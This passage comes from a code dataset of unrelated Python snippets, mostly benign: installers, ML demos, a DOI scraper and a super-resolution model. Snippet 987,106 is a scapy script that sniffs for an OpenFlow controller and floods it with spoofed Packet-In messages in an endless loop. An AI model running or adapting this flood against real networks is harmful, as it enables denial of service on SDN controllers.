index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
987,100 | 358875bfef0a67e96076967b9f0be6493760c68e | # -*- encoding: utf-8 -*-
import os
import sys,glob
#prefix = sys.prefix
#scriptdir = os.path.join(prefix,'Scripts')
#easy_inst = os.path.join(scriptdir, 'easy_install.exe')
#if not os.access(easy_inst,os.F_OK):
# print u'请安装easy_install工具'
# sys.exit(1)
# Bootstrap configuration: `easy_inst` is the installer script invoked for
# packages with no special handling; each pkgs entry is
# [display name, easy_install package name, importable module name].
easy_inst = 'ez_setup.py'
pkgs = [
    ['Numeric', 'Numeric', 'Numeric'],
    ['PIL', 'PIL', 'Image'],
    ['wxPython', 'wxPython', 'wx'],
    ['django', 'django', 'django'],
    ['ctypes', 'ctypes', 'ctypes'],
    ['PyOpenGL', 'PyOpenGL', 'OpenGL.GL'],
    ['pysqlite2', 'pysqlite', 'pysqlite2'],
]
def instpkg(name, instname, importname):
    # Install *name* if `import importname` fails (Python 2 script; the
    # u'...' messages say "checking whether X is installed" / "installing").
    # wxPython and django get special-cased installers; everything else goes
    # through the easy_install bootstrap script.
    try:
        print u'检查'+name+u'是否安装...',
        # exec-based import so the module name can come from data
        exec('import '+importname)
        print u'\r已安装'+name+u',忽略...'
    except:
        print u'\r未安装。正在安装'+name+'...'
        if name == 'wxPython':
            # run the newest bundled wxPython*.exe installer, if present
            wxpy = glob.glob('wxPython*.exe')
            if len(wxpy):
                os.system(wxpy[len(wxpy)-1])
            else:
                print u"安装wxPython没有成功,您可能需要手动安装"
        elif name == 'django':
            # install from an unpacked Django* source directory via setup.py
            pwd = os.getcwd()
            djangopath = glob.glob('Django*')
            for i in djangopath:
                if os.path.isdir(i):
                    os.chdir(i)
                    os.system("setup.py install")
                    os.chdir(pwd)
                    break
        else:
            # generic path: easy_install bootstrap with the local dir as a find-links source
            os.system(easy_inst+' -f ./ '+instname)

# Install every configured package in order.
for pkg in pkgs:
    instpkg(pkg[0], pkg[1], pkg[2])
|
987,101 | ac4aaf778d0ea9cfac29dbc2048e81f0f0bf22df | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 25 17:30:37 2018
@author: K.Ataman
"""
"""
Find linear relation of the kind y = Ax + B + G(n) where G(n) is Additive White
Gaussian Noise
"""
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
# Fit y = A*x + B to noisy synthetic data with TensorFlow 1.x gradient descent,
# plotting the data and the current fit every 5 steps.
num_points = 500
x_point = []
y_point = []
a = 0.22  # true slope used to generate the data
b = 0.78  # true intercept
"""generate random data"""
for i in range(num_points):
    x = np.random.normal(0.0, 0.5)
    # y = ax + b with some additional noise
    y = a*x + b + np.random.normal(0.0, 0.1)
    x_point.append([x])
    y_point.append([y])
# A represents our estimation of A, with uniform initialization
A = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
B = tf.Variable(tf.zeros([1]))
# x_point/y_point are Python lists of [x] rows; TF converts them to tensors
y = A * x_point + B
# mean square error is defined as cost
cost_function = tf.reduce_mean(tf.square(y - y_point))
# optimize cost using gradient descent
optimizer = tf.train.GradientDescentOptimizer(0.5)
train = optimizer.minimize(cost_function)
model = tf.global_variables_initializer()
with tf.Session() as session:
    session.run(model)
    for step in range(0, 21):
        # train (includes data feeding)
        session.run(train)
        # plot results every 5 steps: raw points plus the current fitted line
        if (step % 5) == 0:
            plt.plot(x_point, y_point, 'o',
                     label='step = {}'
                     .format(step))
            plt.plot(x_point,
                     session.run(A) *
                     x_point +
                     session.run(B))
            plt.legend()
            plt.show()
987,102 | 88d9fc64dc6bf18fe9771bc3432d7a61342dade6 | #오른쪽 아래가 직각인 이등변 삼각형으로 *출력
# Print a right-angled isosceles triangle (right angle at bottom-right),
# one extra star per row, padded with spaces on the left.
print('오른쪽 아래가 직각인 이등변 삼각형으로 *출력')
n = int(input('짧은 변의 길이를 입력:'))
for row in range(1, n + 1):
    print(' ' * (n - row) + '*' * row)
987,103 | 537621c77b3841ff91d0c9ba7083bc183cf06fa9 | import logging
def main(name: str) -> str:
    """Return a greeting string for *name*."""
    return "Hello {}!".format(name)
|
987,104 | 1d2e2eb2c10108687a1dc49559484804e918c456 | from cmsplugin_rst.models import RstPluginModel
from django import forms
help_text = '<a href="http://docutils.sourceforge.net/docs/ref/rst/restructuredtext.html">Reference</a>'
class RstPluginForm(forms.ModelForm):
    """Admin/CMS edit form for RstPluginModel: a large monospace textarea
    for the reStructuredText body, with a syntax-reference link as help text."""
    body = forms.CharField(
        widget=forms.Textarea(attrs={
            'rows': 30,
            'cols': 80,
            'style': 'font-family:monospace'
        }),
        help_text=help_text
    )

    class Meta:
        # NOTE(review): modern Django versions require an explicit `fields`
        # or `exclude` on ModelForm Meta — confirm against the project's
        # Django version before upgrading.
        model = RstPluginModel
987,105 | 9970c3bf7333c375f087dd2567bed4a8dfba450e | import re
import sys
import time
import random
from BeautifulSoup import BeautifulSoup
import requests
UA = 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9'
def parse_soup_page(soup):
    """
    :param soup: BeautifulSoup (v3) object obtained from a page of Google
                 Scholar cites, e.g.
                 http://scholar.google.com/scholar?oi=bibs&hl=en&cites=108642523785399070
    :return: list of parsed identifiers (e.g. DOIs) for each result entry;
             entries that cannot be parsed are reported and skipped.
    """
    links = list()
    for div in soup.findAll('div'):
        # each search hit lives in a <div class="gs_ri">; the first <a> is
        # the paper link (BeautifulSoup 3 returns `class` as a plain string)
        if div.name == "div" and div.get('class') == "gs_ri":
            link = div.a['href']
            parsed_link = parse_link(link)
            if parsed_link == "no-match":
                print("Couldn't parse link:\t{0}".format(link))
            else:
                print("DOI:\t{0}".format(parsed_link))
                links.append(parsed_link)
    return links
def parse_link(link):
    """
    :param link: string URL or paper link beginning with http://
    :return: DOI or other identifier, e.g. "10.10..../...", a handle URL,
             or the original link for known no-DOI publishers; the string
             "no-match" when nothing could be extracted.
    """
    # All patterns are raw strings; the original used plain strings whose
    # "\." / "\s" escapes raise invalid-escape-sequence warnings (and will
    # eventually be errors) on modern Python. The pattern text is unchanged.
    # DOI embedded directly in the link
    pattern = r"(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
    matches = re.search(pattern, link, re.UNICODE)
    if matches:
        doi = matches.groups()[0].strip()
        # strip page-type suffixes that are not part of the DOI
        doi = re.sub(r"\/full$", "", doi)
        doi = re.sub(r"\/abstract$", "", doi)
        doi = re.sub(r"\/summary$", "", doi)
        if doi:
            return doi
    # it might be from biomedcentral
    pattern = r"www\.biomedcentral\.com"
    matches = re.search(pattern, link, re.UNICODE)
    if matches:
        doi = parse_biomedcentral(link)
        if doi:
            return doi
    # it might be from Zootaxa, no dois before 2013 — return the link itself
    pattern = r"www\.mapress\.com\/zootaxa"
    matches = re.search(pattern, link, re.UNICODE)
    if matches:
        doi = link
        if doi:
            return doi
    # it might be from sciencedirect
    pattern = r"www\.sciencedirect\.com"
    matches = re.search(pattern, link, re.UNICODE)
    if matches:
        doi = parse_sciencedirect(link)
        if doi:
            return doi
    # it might be from royal society rspb
    pattern = r"rspb\.royalsocietypublishing\.org"
    matches = re.search(pattern, link, re.UNICODE)
    if matches:
        doi = parse_rspb(link)
        if doi:
            return doi
    # it might be a PDF link from springerlink
    pattern = r"springerlink\.com\/.+pdf$"
    matches = re.search(pattern, link, re.UNICODE)
    if matches:
        doi = parse_springerlink_pdf(link)
        if doi:
            return doi
    # it might be from Scielo but not a link to a PDF file
    pattern = r"www\.scielo\..+[^pdf]$"
    matches = re.search(pattern, link, re.UNICODE)
    if matches:
        doi = parse_scielo(link)
        if doi:
            return doi
    # it might be a handle — rewrite to the canonical hdl.handle.net URL
    pattern = r"\/handle\/(\d+\/\d+)"
    matches = re.search(pattern, link, re.UNICODE)
    if matches:
        doi = "http://hdl.handle.net/" + matches.groups()[0]
        return doi
    # it might be a sysbio.oxfordjournals.org early-pub link
    pattern = r"sysbio.oxfordjournals.org\/.+\/early\/.+\/sysbio\.(.+)\.short"
    matches = re.search(pattern, link, re.UNICODE)
    if matches:
        doi = "10.1093/sysbio/" + matches.groups()[0]
        return doi
    # couldn't find a match
    return "no-match"
def parse_scielo(link):
    """
    :param link: string URL of a Scielo article page (not a PDF link)
    :return: DOI string when one is found in the page's <h4 id="doi"> tag,
             otherwise "" (empty string).
    """
    req = requests.get(link, headers={'User-Agent': UA})
    html_doc = req.text
    soup = BeautifulSoup(html_doc)
    try:
        # Scielo article pages expose the DOI in an <h4 id="doi"> element
        doi = soup.find('h4', attrs={'id': 'doi'}).contents[0]
    except:
        doi = ""
    # validate/normalize: keep only the DOI-shaped part of the text
    pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
    matches = re.search(pattern, doi, re.UNICODE)
    if matches:
        doi = matches.groups()[0].strip()
    return doi
def parse_springerlink_pdf(link):
    """
    :param link: string URL from springerlink ending with "pdf"
    :return: DOI string taken from the page's citation_doi <meta> tag.
             NOTE(review): returns None implicitly when no citation_doi
             meta tag is present — callers treat falsy as "not found".
    """
    req = requests.get(link, headers={'User-Agent': UA})
    html_doc = req.text
    soup = BeautifulSoup(html_doc)
    for meta in soup.findAll("meta"):
        if meta.get('name') == "citation_doi":
            doi = meta.get('content')
            # keep only the DOI-shaped part of the meta content
            pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
            matches = re.search(pattern, doi, re.UNICODE)
            if matches:
                doi = matches.groups()[0].strip()
            return doi
def parse_biomedcentral(link):
    """
    :param link: string URL from biomedcentral starting with http://
    :return: DOI string from the article page's citation_doi <meta> tag;
             returns None implicitly when the tag is absent.
    """
    if "pdf" in link:
        # rewrite a direct PDF link to its article-page form, e.g.
        # http://www.biomedcentral.com/content/pdf/1471-2148-12-82.pdf
        # -> http://www.biomedcentral.com/1471-2148/12/82
        link = re.sub("content\/pdf\/", "", link)
        link = re.sub("\.pdf$", "", link)
        link = re.sub("-(\d+)-(\d+)$", "/\\1/\\2", link)
    req = requests.get(link, headers={'User-Agent': UA})
    html_doc = req.text
    soup = BeautifulSoup(html_doc)
    for meta in soup.findAll("meta"):
        if meta.get('name') == "citation_doi":
            doi = meta.get('content')
            # keep only the DOI-shaped part of the meta content
            pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
            matches = re.search(pattern, doi, re.UNICODE)
            if matches:
                doi = matches.groups()[0].strip()
            return doi
def parse_sciencedirect(link):
    """
    :param link: string URL from sciencedirect starting with http://
    :return: DOI string extracted from the page's #ddDoi anchor href.
             NOTE(review): returns None implicitly when the link is a PDF
             or no DOI-shaped text is found in the anchor.
    """
    if "pdf" not in link:
        req = requests.get(url=link, headers={'User-Agent': UA})
        html_doc = req.text
        soup = BeautifulSoup(html_doc)
        # the DOI link is carried by an anchor with id="ddDoi"
        tag = soup.find('a', attrs={'id': 'ddDoi'})
        try:
            doi_link = tag.get("href")
        except:
            doi_link = ""
        pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
        matches = re.search(pattern, doi_link, re.UNICODE)
        if matches:
            doi = matches.groups()[0].strip()
            return doi
def parse_rspb(link):
    """
    :param link: string URL from royal society rspb starting with http://
    :return: DOI string from the page's DC.Identifier <meta> tag;
             returns None implicitly for PDF links or when the tag is absent.
    """
    if "pdf" not in link:
        req = requests.get(link, headers={'User-Agent': UA})
        html_doc = req.text
        soup = BeautifulSoup(html_doc)
        for meta in soup.findAll("meta"):
            # rspb exposes the DOI via Dublin Core metadata
            if meta.get('name') == "DC.Identifier":
                doi = meta.get('content')
                pattern = "(10\.[0-9]{3,}[\.\d+]*\/(?![\"&'<>])\S+)"
                matches = re.search(pattern, doi, re.UNICODE)
                if matches:
                    doi = matches.groups()[0].strip()
                return doi
def get_total_hits(soup):
    """Return the total result count (as a string) from the Google Scholar
    "About N results" banner (#gs_ab_md); returns None implicitly when the
    banner text does not match."""
    results = soup.find('div', attrs={'id': 'gs_ab_md'}).contents[0]
    matches = re.search("About\s(\d+)\s", results)
    if matches:
        hits = matches.groups()[0]
        return hits
def get_citing_dois(cites_url):
    """
    :param cites_url: a citation url from GoogleScholar
    :return: a list of DOIs extracted from URLs by following the links

    Sleeps random intervals between requests to avoid being rate-limited.
    When the hit count can be read, pages through results 20 at a time;
    otherwise falls back to parsing just the first page.
    """
    n = random.random() * 5
    time.sleep(n)
    print("Sleeping: {0} seconds".format(n))
    # GS seems to allow only 20 hits per page!
    cites_url += "&num=20"
    req = requests.get(cites_url, headers={'User-Agent': UA})
    html_doc = req.text
    soup = BeautifulSoup(html_doc)
    hits = get_total_hits(soup)
    print("Got a total of {0} hits".format(hits))
    if hits:
        hits = int(hits)
        index = 0
        dois = []
        # walk result pages via the &start= offset until all hits consumed
        while hits > 1:
            n = random.random()*2
            time.sleep(n)
            if index > 0:
                url = cites_url + "&start=" + str(index)
            else:
                url = cites_url
            index += 20
            hits -= 20
            req = requests.get(url, headers={'User-Agent': UA})
            html_doc = req.text
            soup = BeautifulSoup(html_doc)
            links = parse_soup_page(soup)
            for i in links:
                dois.append(i)
        return dois
    else:
        # just do 20 records
        req = requests.get(cites_url, headers={'User-Agent': UA})
        html_doc = req.text
        soup = BeautifulSoup(html_doc)
        return parse_soup_page(soup)
def main():
    """CLI entry point: expects a Google Scholar citation URL as argv[1]
    and prints/collects the DOIs of the citing papers."""
    random.seed()
    if len(sys.argv) < 2:
        print("Enter as argument a google scholar citation link")
        print("Example: http://scholar.google.com/scholar?oi=bibs&hl=en&cites=108642523785399070")
        sys.exit(1)
    cites_url = sys.argv[1].strip()
    get_citing_dois(cites_url)

if __name__ == "__main__":
    main()
|
987,106 | 5d30b345b27c1a5a00453c5983113dff52dff694 | import subprocess as sub
import scapy
from scapy.all import *
from scapy.contrib import openflow as op
# Network configuration for the OpenFlow packet-in flood below.
src_ip = "192.168.0.2"      # spoofed source IP for crafted packets
interface = "eth0"          # interface packets are sent on
ctrl_ip = "192.168.0.3"     # default controller IP (overridden by ctrl_data())
ctrl_port = 6653            # default OpenFlow controller port
def ctrl_data():
    """Sniff 20 packets of OpenFlow traffic (TCP port 6653) with tcpdump,
    then read the capture back and return [controller_ip, controller_port]
    taken from the first matching packet; returns a one-element message
    list when nothing matched."""
    data = []
    # capture 20 packets to capture.pcap; requires sudo/tcpdump on the host
    capture = sub.Popen(('sudo', 'tcpdump', '-ni', 'eth0', 'tcp', 'port', '6653', '-w', 'capture.pcap', '-c', '20'), stdout=sub.PIPE)
    for row in iter(capture.stdout.readline, b''):
        print (row.rstrip())
    cap = rdpcap('capture.pcap')
    #i=0
    for caps in cap:
        try:
            # caps[3].type == 5: presumably the OpenFlow message type of
            # interest (e.g. features reply) — TODO confirm against the
            # scapy openflow contrib layer
            if (caps[3].type == 5) and not data:
                print('enter')
                ctrl_ip = caps[1].src
                # NOTE(review): reads the packet's *source* port as the
                # controller port — verify direction of the matched packet
                ctrl_port = caps["IP"].sport
                print('\nController IP:' +ctrl_ip)
                data.append(ctrl_ip)
                print('Controller port:' )
                print(ctrl_port)
                print('\n')
                data.append(ctrl_port)
        except:
            # packets without the expected layers are skipped
            pass
    if not data:
        msg = 'It did not enter the if loop'
        data.append(msg)
    return data
def attack(ctrl_ip, ctrl_port):
    """Flood the OpenFlow controller with crafted Packet-In messages.

    Builds Ether/IP/TCP/OFPTPacketIn frames with an incrementing TCP
    sequence number and sends them forever (never returns).
    """
    i = 0
    while True:
        packetin = Ether(src="02:42:c0:a8:00:02", dst="02:42:c0:a8:00:03")/IP(dst= ctrl_ip, src= src_ip)/op.TCP(sport= 46688 , dport= ctrl_port, seq=i)/op.OFPTPacketIn()
        i = i+1
        # packetin.show()
        sendp(packetin, iface = interface)
        print('Sending Packet_In to controller')
|
987,107 | 3a52c3b5c14fe06e3dd837c028b17e2bf4ec0347 | test = {
'name': 'q6',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> isinstance(answer6, list)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> all([isinstance(elt, str) for elt in answer6])
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> all([elt in calls['CVLEGEND'].values for elt in answer6])
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> set(answer6) == set(['LARCENY', 'BURGLARY - VEHICLE', 'VANDALISM', 'DISORDERLY CONDUCT', 'ASSAULT'])
True
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
|
987,108 | aa28c629c91f6627f101653b1d9428f077bda1aa | """
Coded by Matthew Nebel for the CogWorks IFF experiment
The Picture class is used to easily store information about and manipulate the art assets of the experiment.
Variables:
image - stores the picture itself, scaled by the given number
loc - a tuple storing the x and y coordinate of the image
Functions:
init - takes the filename of an image on the computer, a tuple containing the x and y coordinates of
where the image should be drawn on the screen, and a float value to scale the image by.
shade - takes a tuple of RGB values between 0 and 1 to shade the entire image with
"""
import pygame, sys, math, numpy
from pygame.locals import *
class Picture:
    """Wrapper around a pygame surface loaded from looming_art/, pre-scaled.

    Attributes:
        image: the loaded, alpha-converted, smooth-scaled pygame surface
        loc: (x, y) tuple of where the image should be drawn
    """

    def __init__(self, filename, location, scale):
        # convert_alpha keeps per-pixel transparency for later shading
        self.image = pygame.image.load("looming_art/"+filename).convert_alpha()
        self.image = pygame.transform.smoothscale(self.image, (int(self.image.get_width()*scale), int(self.image.get_height()*scale)))
        self.loc = location

    def shade(self, color):
        """Return a copy of the image multiplied channel-wise by *color*
        (an RGB tuple of 0-255 values), preserving the original alpha."""
        copy1 = self.image.copy()
        copy2 = self.image.copy()
        # snapshot alpha before the RGB pass so it can be restored afterwards
        alphaCopy = pygame.surfarray.array_alpha(copy1)
        alphaRef = pygame.surfarray.pixels_alpha(copy1)
        RGBarray = pygame.surfarray.pixels3d(copy2)
        # NOTE(review): pixels3d yields an integer array; in-place *= with a
        # float fails on modern numpy (unsafe cast) — confirm the runtime's
        # numpy version supports this.
        RGBarray[:,:,0] *= color[0]/255.0
        RGBarray[:,:,1] *= color[1]/255.0
        RGBarray[:,:,2] *= color[2]/255.0
        pygame.surfarray.blit_array(copy1, RGBarray)
        alphaRef[:] = alphaCopy
        return copy1
987,109 | 77bcf3cd5a8aabd489e18e17635e7a8bd56af23b | import unittest
import sys
sys.path.append('../')
from Methods.CreateCategory import Category
class TestCategory(unittest.TestCase):
    """
    Purpose: Test Category
    Author: Zach
    Tests:
        test_can_create_a_category
        test_can_register_category_to_database
    """
    @classmethod
    def setUpClass(self):
        # NOTE(review): conventional name for the classmethod parameter is
        # `cls`; the shared fixture is one Category named "Food".
        self.food = Category(
            category_name = "Food")

    def test_can_create_a_category(self):
        # Test is food a type of Category
        self.assertIsInstance(self.food, Category)

    def test_can_register_category_to_database(self):
        # Test if Food can be added to the database
        # Test if Food is in the Database
        self.food.save_category(self.food)
        self.assertTrue(Category.category_is_registered(self.food))

# run unittest
if __name__ == "__main__":
    unittest.main()
987,110 | 9fa77ff3028f6e8db040c0681f7827732c1df226 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 24 19:22:41 2018
@author: labuser
"""
# Load and display limit scans from 2018-09-24
import os
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import cauchy
from scipy.optimize import curve_fit
import pandas as pd
def limit_scan(fname):
    """Load a tab-separated limit scan ('f', 's', 'sb' columns), compute the
    background-subtracted signal sig = s - sb, and plot it against frequency."""
    data = pd.read_csv(fname, sep='\t', comment="#", index_col=False)
    data['sig'] = data['s'] - data['sb']
    data.sort_values(by='f', inplace=True)
    data.plot(x='f', y='sig')
    return
def cauchy_model(x, a, loc, scale, y0):
    """Lorentzian (Cauchy) peak of amplitude *a* centered at *loc* with
    width *scale*, sitting on a constant baseline *y0*."""
    return y0 + a * cauchy.pdf(x, loc, scale)
def cauchy_fit(x, y):
    """Fit cauchy_model to (x, y) and return the optimal parameters.

    The initial guess puts the peak at the max of y, with width and
    amplitude scaled from the data ranges.
    """
    p0 = [(max(y) - min(y))*(max(x) - min(x))/10,
          x[np.argmax(y)],
          (max(x) - min(x))/10, min(y)]
    popt, pcov = curve_fit(cauchy_model, x, y, p0)
    # NOTE(review): prints popt[1]*1e-6 labelled "GHz" — that factor is
    # Hz -> MHz; confirm the intended units of the frequency column.
    print("Center Frequency is : ", popt[1]*1e-6, " GHz")
    return popt
def mw_fscan(fname):
    """Load a headerless two-column (f, s) microwave frequency scan, fit a
    Cauchy peak to it, and overlay the fit on a plot of the data."""
    data = pd.read_csv(fname, sep="\t", comment="#", index_col=False,
                       header=None, names=['f', 's'])
    data.sort_values(by='f', inplace=True)
    popt = cauchy_fit(data['f'].values, data['s'].values)
    # print(popt)
    ax = data.plot(x='f', y='s')
    ax.plot(data['f'].values, cauchy_model(data['f'].values, *popt))
    return
if __name__ == "__main__":
    # Analyze the 2018-09-24 run; switch fname/limit_scan to look at the
    # limit-scan data instead of the microwave frequency scan.
    # fname = "1_lim_dye.txt"
    fname = "2_fscan.txt"
    folder = os.path.join("..", "2018-09-24")
    fname = os.path.join(folder, fname)
    # limit_scan(fname)
    mw_fscan(fname)
987,111 | f6368ca316c791e62355da544ca662b2d92f1da3 | import xlrd
# Compare the set of cities in the POI spreadsheet against those in book3
# and print (country -- city) for every POI city missing from book3.
book3 = xlrd.open_workbook("book3.xlsx")
poi = xlrd.open_workbook("POI_CityGuide_global_final_07_10.xlsx")
sheetBook3 = book3.sheet_by_index(0)
sheetPoi = poi.sheet_by_index(0)
# column 16 = country, column 17 = city (0-based) in the POI sheet
poicountry = [x.strip().lower() for x in sheetPoi.col_values(16)]##set= to elminate duplicates
poicity = [x.strip().lower() for x in sheetPoi.col_values(17)]
# first country seen for each city wins
poidic={}
for city, country in zip (poicity, poicountry):
    if city not in poidic:
        poidic[city] = country
poicountry = [x.lower() for x in poicountry]##x.lower to lower down alphabets
l = [x.strip() for x in sheetPoi.col_values(17)]
c=[]
# the try/except guards against console encoding errors while printing
for x, city in enumerate(l):
    try:
        print (x, city)
        c.append(city)
    except:
        pass
        #print(x)
# dedupe and normalize both city lists before diffing
poicity = list(set(c))
poicity = [x.lower() for x in poicity]
Bookcity =list(set( sheetBook3.col_values(2)))
Bookcity = [x.lower() for x in Bookcity]
difference=(list(set(poicity) - set(Bookcity)))
print ("differences ------------")
for x in difference:
    print(poidic[x] + "--" + x)
print (len(difference))
|
987,112 | 94fa819e207fd8bc902fb5cc2ae883e2349ef4b4 | nums = int(input())
res = []
for i in range(nums):
length = int(input())
list1 = input().split(" ")
list1 = [int(i) for i in list1]
list1.sort()
k = 0
while k < len(list1) - 1:
if list1[k] == list1[k + 1]:
res.append(k + 1)
break
k += 1
else:
res.append(-1)
for i in res:
print(i) |
987,113 | db3f66f602b48b6ac3d3d2ea973f4d8aaad9a4a0 | 직사각형별찍기.py
# Read width `a` and height `b`, then print a b-row rectangle of '*'.
a, b = map(int, input().strip().split(' '))
for _ in range(b):
    print('*' * a)
|
987,114 | 5faf2895d553068f4911ee002b33c1c1b249cbeb | import h5py as h5
import pandas as pd
name = "mnist_nn_64.h5"
f = h5.File(name)
for layer in f['model_weights']:
pd.DataFrame(f['model_weights'][layer][layer]['kernel:0']).to_csv(f"mnist_{layer}_kernel_array.csv", index=False, header=False, sep='\n')
pd.DataFrame(f['model_weights'][layer][layer]['bias:0']).to_csv(f"mnist_{layer}_bias_array.csv", index=False, header=False)
|
987,115 | cc73d0e021065d7be90598378cf98fc16a48770d | import torch
import torch.nn as nn
import math
'''
This is PyTorch implementation of BSRN('Lightweight and Efficient Image Super-Resolutionwith Block
State-based Recursive Network'). The original code is based on TensorFlow and the github is
'https://github.com/idearibosome/tf-bsrn-sr'
'''
def make_model(args, parent=False):
    """Framework factory hook returning a BSRN instance.

    *args* is accepted for API compatibility with the surrounding training
    framework but is unused: BSRN's __init__ in this file takes no
    configuration, so the original `BSRN(args)` raised TypeError.
    """
    return BSRN()
class MeanShift(nn.Conv2d):
    """Fixed 1x1 convolution that subtracts (sign=-1) or adds (sign=1) the
    255-scaled dataset RGB mean, normalized by the per-channel std."""

    def __init__(self, rgb_mean, rgb_std, sign=-1):
        super(MeanShift, self).__init__(3, 3, kernel_size=1)
        std = torch.Tensor(rgb_std)
        mean = torch.Tensor(rgb_mean)
        # identity kernel divided by std: pure per-channel scaling
        self.weight.data = torch.eye(3).view(3, 3, 1, 1) / std.view(3, 1, 1, 1)
        # shift by +/- 255 * mean, in std units
        self.bias.data = sign * 255. * mean / std
        self.requires_grad = False
class Upsampler(nn.Sequential):
    """Pixel-shuffle upsampling head.

    Supports power-of-two scales (repeated x2 conv+shuffle stages, with an
    inplace ReLU after each stage when *act* is truthy) and scale 3 (single
    x3 stage followed by *act* when it is not None). Other scales raise
    NotImplementedError.
    """

    def __init__(self, scale, n_feats, act):
        layers = []
        if (scale & (scale - 1)) == 0:  # scale is a power of two
            for _ in range(int(math.log(scale, 2))):
                layers.append(nn.Conv2d(n_feats, 4 * n_feats, 3, padding=1))
                layers.append(nn.PixelShuffle(2))
                if act:
                    layers.append(nn.ReLU(True))
        elif scale == 3:
            layers.append(nn.Conv2d(n_feats, 9 * n_feats, 3, padding=1))
            layers.append(nn.PixelShuffle(3))
            if act is not None:
                layers.append(act)
        else:
            raise NotImplementedError
        super(Upsampler, self).__init__(*layers)
class Residual_block(nn.Module):
    """BSRN recurrent residual block carrying a channel-wise hidden state.

    Generalization: the channel split in forward() now follows ``n_feats``
    instead of the hard-coded 64, so the block works for any channel width
    (behavior is unchanged for the default n_feats=64).
    """

    def __init__(self, n_feats, kernel_size, act):
        super(Residual_block, self).__init__()
        self.n_feats = n_feats  # remembered for the feature/state split
        self.conv1 = nn.Conv2d(n_feats * 2, n_feats * 2, kernel_size, 1, kernel_size // 2)
        self.conv2 = nn.Conv2d(n_feats * 2, n_feats * 2, kernel_size, 1, kernel_size // 2)
        self.conv3 = nn.Conv2d(n_feats * 2, n_feats * 2, kernel_size, 1, kernel_size // 2)
        self.act = act

    def forward(self, x, state):
        """Process features *x* with hidden *state*; returns (out, new_state),
        both of shape (N, n_feats, H, W)."""
        concat = torch.cat([x, state], 1)
        res = self.conv1(concat)
        res = self.conv2(self.act(res))
        # was torch.split(res, (64, 64), dim=1): broke for n_feats != 64
        res, state = torch.split(res, (self.n_feats, self.n_feats), dim=1)
        res = res + x
        state = self.conv3(torch.cat([res, state], dim=1))
        res2, state = torch.split(state, (self.n_feats, self.n_feats), dim=1)
        return res + res2, state
# recursive residual block (n_recursions = 15)
class RRB(nn.Module):
    """Applies one shared Residual_block n_recursions times, threading the
    block state through the iterations (weight sharing = recursion)."""

    def __init__(self, n_recursions, n_feats, kernel_size, act):
        super(RRB, self).__init__()
        self.n_recursions = n_recursions
        # a single block instance is reused every iteration
        self.block = Residual_block(n_feats, kernel_size, act)

    def forward(self, x):
        # state = torch.zeros(x.shape).cuda() # initialize first state to zeros (GPU variant)
        state = torch.zeros(x.shape)  # first state initialized to zeros
        for i in range(self.n_recursions):
            x, state = self.block(x, state)
        return x
class BSRN(nn.Module):
    """Block State-based Recursive Network for 4x single-image
    super-resolution (DIV2K mean normalization, 64 features,
    15 recursions). Hyperparameters are fixed in __init__."""

    def __init__(self):
        super(BSRN, self).__init__()
        n_recursions = 15
        n_colors = 3
        n_feats = 64
        kernel_size = 3
        scale = 4
        act = nn.ReLU(True)
        # RGB mean for DIV2K
        rgb_mean = (0.4488, 0.4371, 0.4040)
        rgb_std = (1.0, 1.0, 1.0)
        self.sub_mean = MeanShift(rgb_mean, rgb_std)
        self.add_mean = MeanShift(rgb_mean, rgb_std, 1)
        # feature shallow extraction layer
        self.head = nn.Conv2d(n_colors, n_feats, kernel_size, padding=kernel_size // 2)
        # middle feature extraction layer
        self.body = RRB(n_recursions, n_feats, kernel_size, act)
        # upsample and reconstruction layer
        self.tail = nn.Sequential(*[
            Upsampler(scale, n_feats, act=None),
            nn.Conv2d(n_feats, n_colors, kernel_size=3, padding=kernel_size // 2)
        ])

    def forward(self, x):
        # normalize -> extract -> recurse -> upsample -> de-normalize
        x = self.sub_mean(x)
        x = self.head(x)
        x = self.body(x)
        x = self.tail(x)
        x = self.add_mean(x)
        return x
# Quick parameter/FLOPs report on a 3x10x10 input (torchstat is a
# third-party profiling tool; this runs at import time).
from torchstat import stat
net = BSRN()
stat(net, (3, 10, 10))
987,116 | 636d8bb7917e780f105f12a5a05c71fd411218b3 | import gspread
import mlbgame
import calendar
import time
from oauth2client.service_account import ServiceAccountCredentials
def initMonth(month, numDays):
    """Create one worksheet per day of *month* (named e.g. 'April1') in the
    'BettingSim' Google Sheet, each sized 50 rows x 10 columns."""
    # use creds to create a client to interact with the Google Drive API
    scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
    creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
    client = gspread.authorize(creds)
    name = calendar.month_name[month]
    # Find a workbook by name and open the first sheet
    # Make sure you use the right name here.
    wb = client.open('BettingSim')
    for i in range(1, numDays+1):
        fullName = name+""+str(i)
        wb.add_worksheet(fullName, 50, 10)
def clearMonth(month, numDays):
    """Delete the per-day worksheets for *month* from 'BettingSim'
    (inverse of initMonth; fails if a sheet is missing)."""
    # use creds to create a client to interact with the Google Drive API
    scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
    creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
    client = gspread.authorize(creds)
    name = calendar.month_name[month]
    # Find a workbook by name and open the first sheet
    # Make sure you use the right name here.
    wb = client.open('BettingSim')
    for i in range(1, numDays+1):
